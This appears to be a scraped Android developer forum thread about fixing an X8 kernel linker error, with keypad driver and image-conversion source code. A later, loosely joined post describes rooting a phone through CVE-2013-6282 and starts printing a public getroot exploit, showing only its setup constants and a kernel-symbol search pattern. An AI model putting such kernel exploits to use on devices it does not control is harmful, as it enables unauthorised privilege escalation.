make: *** [.tmp_vmlinux1] Error 1[/COLOR][/FONT]
I did some regex on all files in the SE directory and sub-directory, looking for any mentioning of semc_gpio_event_matrix_func, there are 5 files that has it, namely...
/home/android/android/sources/kernel/arch/arm/mach-msm/board-mimmi-keypad.c
/home/android/android/sources/kernel/arch/arm/mach-msm/board-robyn-keypad.c
/home/android/android/sources/kernel/arch/arm/mach-msm/board-shakira-keypad.c
/home/android/android/sources/kernel/drivers/misc/semc/gpio_matrix/semc_gpio_matrix.c
/home/android/android/sources/kernel/include/linux/semc/gpio_event.h
Files with silver color is irrelevant, as I'm building the X8. I assume it's safe to ignore them.
my username on the ubuntu is also android, hence the .../android/android/....
Please help me troubleshoot this...
So nice to see someone dev the kernel and I`'m sorry to say I can't help but i'm interested how you wan't to flash the kernel. Isn't it locked by SE to flash a custom kerneL?
I think they give you something so you can use it.
Sent from my Sony Ericsson X8
There should be some way because SE gives us kexec tool even in retail firmware...
Sent from my E15i using XDA App
Asdoos said:
So nice to see someone dev the kernel and I`'m sorry to say I can't help but i'm interested how you wan't to flash the kernel. Isn't it locked by SE to flash a custom kerneL?
Click to expand...
Click to collapse
well if i can't load the whole kernel into the phone, at least i could push custom patched wpa_supplicant.
if it's really impossible, at this date, to use custom ROM on X8 why would then people are toying with the Floyo port?
For now, I'd be happy to just solve patching wpa_supplicant. But since I'm already into this, why not get it done with.
So now there's 3 files that are involved.
herein, are those 3 files, underneath each of which are the files that it #includes and their respective location in the filesystem.
to be honest, i was only looking to play with the config files when i started this.
i've never compiled project this big (i did, but that was looong time ago, and it went without a hitch).
for the past 2 years i only programmed Arduino on C, and occasionally PHPs. So i rarely have to deal much with header files. Also some recreational cracking utilising assembly.
there was a few other errors before this one actually. But it was easily solved by changing <xxxxxx.x> to "xxxxxx.x"
so guys please, please help me.
/home/android/android/sources/kernel/arch/arm/mach-msm/board-shakira-keypad.c
#include <linux/platform_device.h>
location : /home/android/android/sources/kernel/include/linux/platform_device.h
#include <linux/gpio_event.h>
location : /home/android/android/sources/kernel/include/linux/gpio_event.h
#include <linux/semc/gpio_event.h>
location : /home/android/android/sources/kernel/include/linux/semc/gpio_event.h
#include "board-delta-keypad.h"
location : /home/android/android/sources/kernel/arch/arm/mach-msm/board-delta-keypad.h
#include <mach/semc_rpc_server_handset.h>
location : /home/android/android/sources/kernel/arch/arm/mach-msm/include/mach/semc_rpc_server_handset.h
#include <asm/mach-types.h>
location : /home/android/android/sources/kernel/include/asm/mach-types.h
#include <linux/gpio.h>
location : /home/android/android/sources/kernel/include/linux/gpio.h
/home/android/android/sources/kernel/drivers/misc/semc/gpio_matrix/semc_gpio_matrix.c
#include <linux/kernel.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/gpio.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/gpio_event.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/hrtimer.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/interrupt.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/wakelock.h>
location : /home/android/android/sources/kernel/include/linux/
/home/android/android/sources/kernel/include/linux/semc/gpio_event.h
#include <linux/gpio_event.h>
location : /home/android/android/sources/kernel/include/linux/
#include <linux/input.h>
location : /home/android/android/sources/kernel/include/linux/
see anything?
I would assume any files with the word keypad are referring to the mini10 pro's slide out keyboard. Your x8 doesn't have one so try and remove from the build process.
Either way the bootloader is locked so I'm not really sure how you will push this onto the phone in the first place.
If you do succeed let us know.
Edit: gpio and wakelock events are probably directed to the hardware switch when the keyboard is opened or closed.
Sent from my Sony Ericsson X8 using XDA App
biglama said:
I would assume any files with the word keypad are referring to the mini10 pro's slide out keyboard. Your x8 doesn't have one so try and remove from the build process.
Either way the bootloader is locked so I'm not really sure how you will push this onto the phone in the first place.
If you do succeed let us know.
Edit: gpio and wakelock events are probably directed to the hardware switch when the keyboard is opened or closed.
Sent from my Sony Ericsson X8 using XDA App
Click to expand...
Click to collapse
in board-shakira-keypad.c, the keys that it governs are the volume up/down, cameray, back, menu and home keys. nothing more, nothing less.
so i'm pretty sure it is for x8.
I'll post the content of the file later.
undefined reference to `semc_gpio_event_matrix_func'
Click to expand...
Click to collapse
can you just look in semc_gpio_matrix.c and add a prototype for that function into board-shakira-keypad.c if it's not provided in any of the other headers.
Source - semc_gpio_matrix.c
as said, the source files...
semc_gpio_matrix.c
Code:
/* drivers/misc/semc/gpio_matrix/gpio_matrix.c
*
* Copyright (C) 2010 Sony Ericsson Mobile Communications AB
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* Based upon kernel/drivers/input/misc/gpio_matrix.c
*/
#include <linux/kernel.h>
#include <linux/gpio.h>
#include <linux/gpio_event.h>
#include <linux/hrtimer.h>
#include <linux/interrupt.h>
#include <linux/wakelock.h>
struct gpio_kp {
struct gpio_event_input_devs *input_devs;
struct gpio_event_matrix_info *keypad_info;
struct hrtimer timer;
struct wake_lock wake_lock;
int current_output;
unsigned int use_irq:1;
unsigned int key_state_changed:1;
unsigned int last_key_state_changed:1;
unsigned int some_keys_pressed:2;
unsigned long keys_pressed[0];
};
static void clear_phantom_key(struct gpio_kp *kp, int out, int in)
{
struct gpio_event_matrix_info *mi = kp->keypad_info;
int key_index = out * mi->ninputs + in;
unsigned short keyentry = mi->keymap[key_index];
unsigned short keycode = keyentry & MATRIX_KEY_MASK;
unsigned short dev = keyentry >> MATRIX_CODE_BITS;
if (!test_bit(keycode, kp->input_devs->dev[dev]->key)) {
if (mi->flags & GPIOKPF_PRINT_PHANTOM_KEYS)
pr_info("gpiomatrix: phantom key %x, %d-%d (%d-%d) "
"cleared\n", keycode, out, in,
mi->output_gpios[out], mi->input_gpios[in]);
__clear_bit(key_index, kp->keys_pressed);
} else {
if (mi->flags & GPIOKPF_PRINT_PHANTOM_KEYS)
pr_info("gpiomatrix: phantom key %x, %d-%d (%d-%d) "
"not cleared\n", keycode, out, in,
mi->output_gpios[out], mi->input_gpios[in]);
}
}
static int restore_keys_for_input(struct gpio_kp *kp, int out, int in)
{
int rv = 0;
int key_index;
key_index = out * kp->keypad_info->ninputs + in;
while (out < kp->keypad_info->noutputs) {
if (test_bit(key_index, kp->keys_pressed)) {
rv = 1;
clear_phantom_key(kp, out, in);
}
key_index += kp->keypad_info->ninputs;
out++;
}
return rv;
}
static void remove_phantom_keys(struct gpio_kp *kp)
{
int out, in, inp;
int key_index;
if (kp->some_keys_pressed < 3)
return;
for (out = 0; out < kp->keypad_info->noutputs; out++) {
inp = -1;
key_index = out * kp->keypad_info->ninputs;
for (in = 0; in < kp->keypad_info->ninputs; in++, key_index++) {
if (test_bit(key_index, kp->keys_pressed)) {
if (inp == -1) {
inp = in;
continue;
}
if (inp >= 0) {
if (!restore_keys_for_input(kp, out + 1,
inp))
break;
clear_phantom_key(kp, out, inp);
inp = -2;
}
restore_keys_for_input(kp, out, in);
}
}
}
}
static void report_key(struct gpio_kp *kp, int key_index, int out, int in)
{
struct gpio_event_matrix_info *mi = kp->keypad_info;
int pressed = test_bit(key_index, kp->keys_pressed);
unsigned short keyentry = mi->keymap[key_index];
unsigned short keycode = keyentry & MATRIX_KEY_MASK;
unsigned short dev = keyentry >> MATRIX_CODE_BITS;
if (pressed != test_bit(keycode, kp->input_devs->dev[dev]->key)) {
if (keycode == KEY_RESERVED) {
if (mi->flags & GPIOKPF_PRINT_UNMAPPED_KEYS)
pr_info("gpiomatrix: unmapped key, %d-%d "
"(%d-%d) changed to %d\n",
out, in, mi->output_gpios[out],
mi->input_gpios[in], pressed);
} else {
if (mi->flags & GPIOKPF_PRINT_MAPPED_KEYS)
pr_info("gpiomatrix: key %x, %d-%d (%d-%d) "
"changed to %d\n", keycode,
out, in, mi->output_gpios[out],
mi->input_gpios[in], pressed);
if (mi->info.event)
mi->info.event(kp->input_devs, &mi->info, NULL, dev, 0,
keycode, pressed);
else
input_report_key(kp->input_devs->dev[dev], keycode, pressed);
}
}
}
static enum hrtimer_restart gpio_keypad_timer_func(struct hrtimer *timer)
{
int out, in;
int key_index;
int gpio;
struct gpio_kp *kp = container_of(timer, struct gpio_kp, timer);
struct gpio_event_matrix_info *mi = kp->keypad_info;
unsigned gpio_keypad_flags = mi->flags;
unsigned polarity = !!(gpio_keypad_flags & GPIOKPF_ACTIVE_HIGH);
out = kp->current_output;
if (out == mi->noutputs) {
out = 0;
kp->last_key_state_changed = kp->key_state_changed;
kp->key_state_changed = 0;
kp->some_keys_pressed = 0;
} else {
key_index = out * mi->ninputs;
for (in = 0; in < mi->ninputs; in++, key_index++) {
gpio = mi->input_gpios[in];
if (gpio_get_value(gpio) ^ !polarity) {
if (kp->some_keys_pressed < 3)
kp->some_keys_pressed++;
kp->key_state_changed |= !__test_and_set_bit(
key_index, kp->keys_pressed);
} else
kp->key_state_changed |= __test_and_clear_bit(
key_index, kp->keys_pressed);
}
gpio = mi->output_gpios[out];
if (gpio_keypad_flags & GPIOKPF_DRIVE_INACTIVE)
gpio_set_value(gpio, !polarity);
else
gpio_direction_input(gpio);
out++;
}
kp->current_output = out;
if (out < mi->noutputs) {
gpio = mi->output_gpios[out];
if (gpio_keypad_flags & GPIOKPF_DRIVE_INACTIVE)
gpio_set_value(gpio, polarity);
else
gpio_direction_output(gpio, polarity);
hrtimer_start(timer, mi->settle_time, HRTIMER_MODE_REL);
return HRTIMER_NORESTART;
}
if (gpio_keypad_flags & GPIOKPF_DEBOUNCE) {
if (kp->key_state_changed) {
hrtimer_start(&kp->timer, mi->debounce_delay,
HRTIMER_MODE_REL);
return HRTIMER_NORESTART;
}
kp->key_state_changed = kp->last_key_state_changed;
}
if (kp->key_state_changed) {
if (gpio_keypad_flags & GPIOKPF_REMOVE_SOME_PHANTOM_KEYS)
remove_phantom_keys(kp);
key_index = 0;
for (out = 0; out < mi->noutputs; out++)
for (in = 0; in < mi->ninputs; in++, key_index++)
report_key(kp, key_index, out, in);
}
if (!kp->use_irq || kp->some_keys_pressed) {
hrtimer_start(timer, mi->poll_time, HRTIMER_MODE_REL);
return HRTIMER_NORESTART;
}
/* No keys are pressed, reenable interrupt */
for (out = 0; out < mi->noutputs; out++) {
if (gpio_keypad_flags & GPIOKPF_DRIVE_INACTIVE)
gpio_set_value(mi->output_gpios[out], polarity);
else
gpio_direction_output(mi->output_gpios[out], polarity);
}
for (in = 0; in < mi->ninputs; in++)
enable_irq(gpio_to_irq(mi->input_gpios[in]));
wake_unlock(&kp->wake_lock);
return HRTIMER_NORESTART;
}
static irqreturn_t gpio_keypad_irq_handler(int irq_in, void *dev_id)
{
int i;
struct gpio_kp *kp = dev_id;
struct gpio_event_matrix_info *mi = kp->keypad_info;
unsigned gpio_keypad_flags = mi->flags;
if (!kp->use_irq) /* ignore interrupt while registering the handler */
return IRQ_HANDLED;
for (i = 0; i < mi->ninputs; i++)
disable_irq(gpio_to_irq(mi->input_gpios[i]));
for (i = 0; i < mi->noutputs; i++) {
if (gpio_keypad_flags & GPIOKPF_DRIVE_INACTIVE)
gpio_set_value(mi->output_gpios[i],
!(gpio_keypad_flags & GPIOKPF_ACTIVE_HIGH));
else
gpio_direction_input(mi->output_gpios[i]);
}
wake_lock(&kp->wake_lock);
hrtimer_start(&kp->timer, ktime_set(0, 10000), HRTIMER_MODE_REL);
return IRQ_HANDLED;
}
static int gpio_keypad_request_irqs(struct gpio_kp *kp)
{
int i;
int err;
unsigned int irq;
unsigned long request_flags;
struct gpio_event_matrix_info *mi = kp->keypad_info;
switch (mi->flags & (GPIOKPF_ACTIVE_HIGH|GPIOKPF_LEVEL_TRIGGERED_IRQ)) {
default:
request_flags = IRQF_TRIGGER_FALLING;
break;
case GPIOKPF_ACTIVE_HIGH:
request_flags = IRQF_TRIGGER_RISING;
break;
case GPIOKPF_LEVEL_TRIGGERED_IRQ:
request_flags = IRQF_TRIGGER_LOW;
break;
case GPIOKPF_LEVEL_TRIGGERED_IRQ | GPIOKPF_ACTIVE_HIGH:
request_flags = IRQF_TRIGGER_HIGH;
break;
}
for (i = 0; i < mi->ninputs; i++) {
err = irq = gpio_to_irq(mi->input_gpios[i]);
if (err < 0)
goto err_gpio_get_irq_num_failed;
err = request_irq(irq, gpio_keypad_irq_handler, request_flags,
"gpio_kp", kp);
if (err) {
pr_err("gpiomatrix: request_irq failed for input %d, "
"irq %d\n", mi->input_gpios[i], irq);
goto err_request_irq_failed;
}
disable_irq(irq);
}
return 0;
for (i = mi->noutputs - 1; i >= 0; i--) {
free_irq(gpio_to_irq(mi->input_gpios[i]), kp);
err_request_irq_failed:
err_gpio_get_irq_num_failed:
;
}
return err;
}
int semc_gpio_event_matrix_func(struct gpio_event_input_devs *input_devs,
struct gpio_event_info *info, void **data, int func)
{
int i;
int err;
int key_count;
struct gpio_kp *kp;
struct gpio_event_matrix_info *mi;
mi = container_of(info, struct gpio_event_matrix_info, info);
if (func == GPIO_EVENT_FUNC_SUSPEND || func == GPIO_EVENT_FUNC_RESUME) {
/* TODO: disable scanning */
return 0;
}
if (func == GPIO_EVENT_FUNC_INIT) {
if (mi->keymap == NULL ||
mi->input_gpios == NULL ||
mi->output_gpios == NULL) {
err = -ENODEV;
pr_err("gpiomatrix: Incomplete pdata\n");
goto err_invalid_platform_data;
}
key_count = mi->ninputs * mi->noutputs;
*data = kp = kzalloc(sizeof(*kp) + sizeof(kp->keys_pressed[0]) *
BITS_TO_LONGS(key_count), GFP_KERNEL);
if (kp == NULL) {
err = -ENOMEM;
pr_err("gpiomatrix: Failed to allocate private data\n");
goto err_kp_alloc_failed;
}
kp->input_devs = input_devs;
kp->keypad_info = mi;
for (i = 0; i < key_count; i++) {
unsigned short keyentry = mi->keymap[i];
unsigned short keycode = keyentry & MATRIX_KEY_MASK;
unsigned short dev = keyentry >> MATRIX_CODE_BITS;
if (dev >= input_devs->count) {
pr_err("gpiomatrix: bad device index %d >= "
"%d for key code %d\n",
dev, input_devs->count, keycode);
err = -EINVAL;
goto err_bad_keymap;
}
if (keycode && keycode <= KEY_MAX)
input_set_capability(input_devs->dev[dev],
EV_KEY, keycode);
}
for (i = 0; i < mi->noutputs; i++) {
if (gpio_cansleep(mi->output_gpios[i])) {
pr_err("gpiomatrix: unsupported output gpio %d,"
" can sleep\n", mi->output_gpios[i]);
err = -EINVAL;
goto err_request_output_gpio_failed;
}
err = gpio_request(mi->output_gpios[i], "gpio_kp_out");
if (err) {
pr_err("gpiomatrix: gpio_request failed for "
"output %d\n", mi->output_gpios[i]);
goto err_request_output_gpio_failed;
}
if (mi->flags & GPIOKPF_DRIVE_INACTIVE)
err = gpio_direction_output(mi->output_gpios[i],
!(mi->flags & GPIOKPF_ACTIVE_HIGH));
else
err = gpio_direction_input(mi->output_gpios[i]);
if (err) {
pr_err("gpiomatrix: gpio_configure failed for "
"output %d\n", mi->output_gpios[i]);
goto err_output_gpio_configure_failed;
}
}
for (i = 0; i < mi->ninputs; i++) {
err = gpio_request(mi->input_gpios[i], "gpio_kp_in");
if (err) {
pr_err("gpiomatrix: gpio_request failed for "
"input %d\n", mi->input_gpios[i]);
goto err_request_input_gpio_failed;
}
err = gpio_direction_input(mi->input_gpios[i]);
if (err) {
pr_err("gpiomatrix: gpio_direction_input failed"
" for input %d\n", mi->input_gpios[i]);
goto err_gpio_direction_input_failed;
}
}
kp->current_output = mi->noutputs;
kp->key_state_changed = 1;
hrtimer_init(&kp->timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
kp->timer.function = gpio_keypad_timer_func;
wake_lock_init(&kp->wake_lock, WAKE_LOCK_SUSPEND, "gpio_kp");
err = gpio_keypad_request_irqs(kp);
kp->use_irq = err == 0;
pr_info("SEMC GPIO Matrix Keypad Driver: Start keypad matrix for "
"%s%s in %s mode\n", input_devs->dev[0]->name,
(input_devs->count > 1) ? "..." : "",
kp->use_irq ? "interrupt" : "polling");
if (kp->use_irq)
wake_lock(&kp->wake_lock);
hrtimer_start(&kp->timer, ktime_set(0, 10000),
HRTIMER_MODE_REL);
return 0;
}
err = 0;
kp = *data;
if (kp->use_irq)
for (i = mi->noutputs - 1; i >= 0; i--)
free_irq(gpio_to_irq(mi->input_gpios[i]), kp);
hrtimer_cancel(&kp->timer);
wake_lock_destroy(&kp->wake_lock);
for (i = mi->noutputs - 1; i >= 0; i--) {
err_gpio_direction_input_failed:
gpio_free(mi->input_gpios[i]);
err_request_input_gpio_failed:
;
}
for (i = mi->noutputs - 1; i >= 0; i--) {
err_output_gpio_configure_failed:
gpio_free(mi->output_gpios[i]);
err_request_output_gpio_failed:
;
}
err_bad_keymap:
kfree(kp);
err_kp_alloc_failed:
err_invalid_platform_data:
return err;
}
Source - board-shakira-keypad.c & linux/semc/gpio_event.h
board-shakira-keypad.c
the scandalous line 90 is highlighted in red.
Code:
/*
* Copyright (C) 2009 SEMC
* Copyright (c) 2008-2009, Code Aurora Forum. All rights reserved.
* Author: Daniel Nygren <[email protected]>
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/platform_device.h>
#include <linux/gpio_event.h>
#include <linux/semc/gpio_event.h>
#include "board-delta-keypad.h"
#include <mach/semc_rpc_server_handset.h>
#include <asm/mach-types.h>
#include <linux/gpio.h>
#define DBG(X)
static unsigned int keypad_row_gpios[] = { 31 };
static unsigned int keypad_col_gpios[] = { 36, 37, 38, 39, 40, 41 };
static atomic_t driver_up_and_running = ATOMIC_INIT(0);
static struct gpio_event_input_devs *kbd_input_dev;
#define KEYMAP_INDEX(row, col) ((row)*ARRAY_SIZE(keypad_col_gpios) + (col))
static const unsigned short keypad_keymap_shakira[ARRAY_SIZE(keypad_col_gpios) *
ARRAY_SIZE(keypad_row_gpios)] = {
[KEYMAP_INDEX(0, 0)] = KEY_BACK, /* Left */
[KEYMAP_INDEX(0, 1)] = KEY_HOME, /* Middle */
[KEYMAP_INDEX(0, 2)] = KEY_MENU, /* Right */
[KEYMAP_INDEX(0, 3)] = KEY_VOLUMEUP,
[KEYMAP_INDEX(0, 4)] = KEY_VOLUMEDOWN,
[KEYMAP_INDEX(0, 5)] = KEY_CAMERA, /* Camera Snap */
};
static const unsigned short wakeup_inputs[ARRAY_SIZE(keypad_col_gpios)] = {
0,
1, /* KEY_HOME */
0,
1, /* KEY_VOLUMEUP */
1, /* KEY_VOLUMEDOWN */
0,
};
static unsigned short w_enabled_inputs[ARRAY_SIZE(keypad_col_gpios)];
static void configure_wakeup_inputs(const unsigned short *wi)
{
int i;
for (i = 0; i < ARRAY_SIZE(keypad_col_gpios); i++) {
if (w_enabled_inputs[i] == wi[i])
continue;
if (set_irq_wake(gpio_to_irq(keypad_col_gpios[i]), wi[i])) {
printk(KERN_ERR "%s: set_irq_wake failed for GPIO %d\n",
__func__, keypad_col_gpios[i]);
} else {
DBG(printk(KERN_DEBUG
"%s: set_irq_wake=%d for GPIO %d\n",
__func__, wi[i], keypad_col_gpios[i]);)
w_enabled_inputs[i] = wi[i];
}
}
}
static int shakira_gpio_event_matrix_func(
struct gpio_event_input_devs *input_devs,
struct gpio_event_info *info,
void **data, int func)
{
if (func == GPIO_EVENT_FUNC_INIT) {
struct input_dev *input_dev = input_devs->dev[0];
kbd_input_dev = input_devs;
input_set_capability(input_dev, EV_KEY, KEY_POWER);
input_set_capability(input_dev, EV_KEY, KEY_END);
atomic_set(&driver_up_and_running, 1);
}
if (func == GPIO_EVENT_FUNC_UNINIT)
atomic_set(&driver_up_and_running, 0);
configure_wakeup_inputs(wakeup_inputs);
return [COLOR="Red"]semc_gpio_event_matrix_func(input_devs, info, data, func)[/COLOR];
}
/* Shakira keypad platform device information */
static struct gpio_event_matrix_info shakira_keypad_matrix_info = {
.info.func = shakira_gpio_event_matrix_func,
.keymap = keypad_keymap_shakira,
.output_gpios = keypad_row_gpios,
.input_gpios = keypad_col_gpios,
.noutputs = ARRAY_SIZE(keypad_row_gpios),
.ninputs = ARRAY_SIZE(keypad_col_gpios),
.settle_time.tv.nsec = 0,
.poll_time.tv.nsec = 20 * NSEC_PER_MSEC,
.flags = GPIOKPF_LEVEL_TRIGGERED_IRQ |
GPIOKPF_PRINT_UNMAPPED_KEYS
};
static struct gpio_event_info *shakira_keypad_info[] = {
&shakira_keypad_matrix_info.info
};
static struct gpio_event_platform_data shakira_keypad_data = {
.name = "shakira_keypad",
.info = shakira_keypad_info,
.info_count = ARRAY_SIZE(shakira_keypad_info)
};
struct platform_device keypad_device_shakira = {
.name = GPIO_EVENT_DEV_NAME,
.id = -1,
.dev = {
.platform_data = &shakira_keypad_data,
},
};
struct platform_device *get_keypad_device_delta(void)
{
return &keypad_device_shakira;
}
void keypad_rpc_key_callback(uint32_t key, uint32_t event)
{
if (!atomic_read(&driver_up_and_running)) {
DBG(printk(KERN_DEBUG "%s: Power key ignored, driver"
" not ready\n", __func__));
return;
}
switch (key) {
case HS_PWR_K:
key = KEY_POWER;
break;
case HS_END_K:
key = KEY_END;
break;
default:
return;
}
DBG(printk(KERN_DEBUG "%s: reporting key (code %d, value %d)\n",
__func__, key, event != HS_REL_K);)
input_report_key(kbd_input_dev->dev[0], key, event != HS_REL_K);
}
gpio_event.h
Code:
#ifndef _SEMC_GPIO_EVENT_H_
#define _SEMC_GPIO_EVENT_H_
#include <linux/gpio_event.h>
#include <linux/input.h>
int semc_gpio_event_matrix_func(struct gpio_event_input_devs *input_dev,
struct gpio_event_info *info, void **data, int func);
int semc_gpio_event_input_func(struct gpio_event_input_devs *input_dev,
struct gpio_event_info *info, void **data, int func);
#endif /*_SEMC_GPIO_EVENT_H_*/
ivorh said:
can you just look in semc_gpio_matrix.c and add a prototype for that function into board-shakira-keypad.c if it's not provided in any of the other headers.
Click to expand...
Click to collapse
Seems like linux/semc/gpio_event.h already declared the prototype. That's all that it does.
i think i know the culprit....
board-shakira-keypad.c calls semc/gpio_event.h to declare the prototype.
but nowhere in those two files have the function actually defined.
The only file that have the function defined, semc_gpio_matrix.c, is not called by any other file.
How come SonyEricsson release such source files? is this not the final set that they use to compile the binaries on our phones?
My question now :
is it okay if i edit board-shakira-keypad.c into something like this :
Code:
#include <linux/platform_device.h>
#include <linux/gpio_event.h>
#include <linux/semc/gpio_event.h>
[COLOR="Red"][B]#include "../../../drivers/misc/semc/gpio_matrix/semc_gpio_matrix.c"[/B][/COLOR]
#include "board-delta-keypad.h"
#include <mach/semc_rpc_server_handset.h>
#include <asm/mach-types.h>
#include <linux/gpio.h>
compilation success this way.
however should i tell the compiler/makefile to find the symbol in the object file of semc_gpio_matrix.c instead?
there's no object file in the folder that contains semc_gpio_matrix.c, except for built-in.o. What should i do?
how about putting a line on top:
extern int semc_gpio_event_matrix_func(struct gpio_event_input_devs *input_dev,
struct gpio_event_info *info, void **data, int func);
And modify the makefile to compile and link the semc_gpio_matrix.c and it object file.
i_hate_sonyericsson said:
if it's really impossible, at this date, to use custom ROM on X8 why would then people are toying with the Floyo port?
Click to expand...
Click to collapse
Rom <> kernel. What they're doing is all BUT the kernel. Making drivers and libraries run on SEMC supplied kernel. I don't know much about low-level on the phone, but it's not like the google dev phones. The bootloader is very different. My guess is it's more like old SEMC phones. The google dev phones boot more like a pc. This is why there's no tether support on these ROMs.
There's tools for flashing files to the device, so I guess if you're able to make compatible files you'll get the kernel in there. Maybe have a word with the creators of the x10flash tool.
Simple!!!!
Asdoos said:
So nice to see someone dev the kernel and I`'m sorry to say I can't help but i'm interested how you wan't to flash the kernel. Isn't it locked by SE to flash a custom kerneL?
Click to expand...
Click to collapse
The answer is so simple...convert the kernel to .sin, then flash it with bin4ry's flasher
Nobody has try this.
Rename sin to img make changes img to sin flash
Sent from my X8
If that was so simple then multitouch would be the first thing done to the phone... Sin files are signed and hashed, if you change them signature becomes invalid and phone won't accept the file...
Sent from my X8, so sorry for gramatical inaccuracy
i think i took the wrong approach in learning system development for android....
i think i should have started via the kitchen section to better and easier understand the low level inner working of the system..
plus, for someone that comes from the Windows world still got much to learn about how things work in Linux world.
Can someone give me link for working to565 program which helps convert raw image files to rle ?
1. Need linux.
2. Script. Name Do.sh
Code:
#!/bin/sh
convert -depth 8 logo.png rgb:logo.raw
./to565 -rle < logo.raw > initlogo.rle
And source. Name to565.c
Code:
/*
* Copyright (C) 2008 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define to565(r,g,b) \
((((r) >> 3) << 11) | (((g) >> 2) << 5) | ((b) >> 3))
#define from565_r(x) ((((x) >> 11) & 0x1f) * 255 / 31)
#define from565_g(x) ((((x) >> 5) & 0x3f) * 255 / 63)
#define from565_b(x) (((x) & 0x1f) * 255 / 31)
void to_565_raw(void)
{
unsigned char in[3];
unsigned short out;
while(read(0, in, 3) == 3) {
out = to565(in[0],in[1],in[2]);
write(1, &out, 2);
}
return;
}
void to_565_raw_dither(int width)
{
unsigned char in[3];
unsigned short out;
int i = 0;
int e;
int* error = malloc((width+2) * 3 * sizeof(int));
int* next_error = malloc((width+2) * 3 * sizeof(int));
memset(error, 0, (width+2) * 3 * sizeof(int));
memset(next_error, 0, (width+2) * 3 * sizeof(int));
error += 3; // array goes from [-3..((width+1)*3+2)]
next_error += 3;
while(read(0, in, 3) == 3) {
int r = in[0] + error[i*3+0];
int rb = (r < 0) ? 0 : ((r > 255) ? 255 : r);
int g = in[1] + error[i*3+1];
int gb = (g < 0) ? 0 : ((g > 255) ? 255 : g);
int b = in[2] + error[i*3+2];
int bb = (b < 0) ? 0 : ((b > 255) ? 255 : b);
out = to565(rb, gb, bb);
write(1, &out, 2);
#define apply_error(ch) { \
next_error[(i-1)*3+ch] += e * 3 / 16; \
next_error[(i)*3+ch] += e * 5 / 16; \
next_error[(i+1)*3+ch] += e * 1 / 16; \
error[(i+1)*3+ch] += e - ((e*1/16) + (e*3/16) + (e*5/16)); \
}
e = r - from565_r(out);
apply_error(0);
e = g - from565_g(out);
apply_error(1);
e = b - from565_b(out);
apply_error(2);
#undef apply_error
++i;
if (i == width) {
// error <- next_error; next_error <- 0
int* temp = error; error = next_error; next_error = temp;
memset(next_error, 0, (width+1) * 3 * sizeof(int));
i = 0;
}
}
free(error-3);
free(next_error-3);
return;
}
void to_565_rle(void)
{
unsigned char in[3];
unsigned short last, color, count;
unsigned total = 0;
count = 0;
while(read(0, in, 3) == 3) {
color = to565(in[0],in[1],in[2]);
if (count) {
if ((color == last) && (count != 65535)) {
count++;
continue;
} else {
write(1, &count, 2);
write(1, &last, 2);
total += count;
}
}
last = color;
count = 1;
}
if (count) {
write(1, &count, 2);
write(1, &last, 2);
total += count;
}
fprintf(stderr,"%d pixels\n",total);
}
int main(int argc, char **argv)
{
if ((argc == 2) && (!strcmp(argv[1],"-rle"))) {
to_565_rle();
} else {
if (argc > 2 && (!strcmp(argv[1], "-w"))) {
to_565_raw_dither(atoi(argv[2]));
} else {
to_565_raw();
}
}
return 0;
}
Then build.
Code:
gcc -o to565 to565.c
Can you put the to565 program in $PATH?
Will the to565 program work if you put it in the $PATH?
On October 25, 2013, a Linux kernel bug CVE-2013-6282 was published. It was largely exploited around that time to get root access on existing Android devices. After reading tons of user review, I also applied the rootkit to get root access on my Sony Xperia - L handeset successfully. It was quite surprising that even the latest firmware update, too, didn't fix the vulnerability. What the flaw basically says is,
The (1) get_user and (2) put_user API functions in the Linux kernel before 3.5.5 on the v6k and v7 ARM platforms do not validate certain addresses, which allows attackers to read or modify the contents of arbitrary kernel memory locations via a crafted application, as exploited in the wild against Android devices in October and November 2013.
Click to expand...
Click to collapse
The rootkit has its source code attached.
Code:
/* getroot 2013/12/07 */
/*
* Copyright (C) 2013 CUBE
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
#define KERNEL_START_ADDRESS 0xc0008000
#define KERNEL_SIZE 0x2000000
#define SEARCH_START_ADDRESS 0xc0800000
#define KALLSYMS_SIZE 0x200000
#define EXECCOMMAND "/system/bin/sh"
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <stdbool.h>
#include <errno.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/system_properties.h>
#define PTMX_DEVICE "/dev/ptmx"
unsigned long *kallsymsmem = NULL;
unsigned long pattern_kallsyms_addresses[] = {
0xc0008000, /* stext */
0xc0008000, /* _sinittext */
0xc0008000, /* _stext */
0xc0008000 /* __init_begin */
};
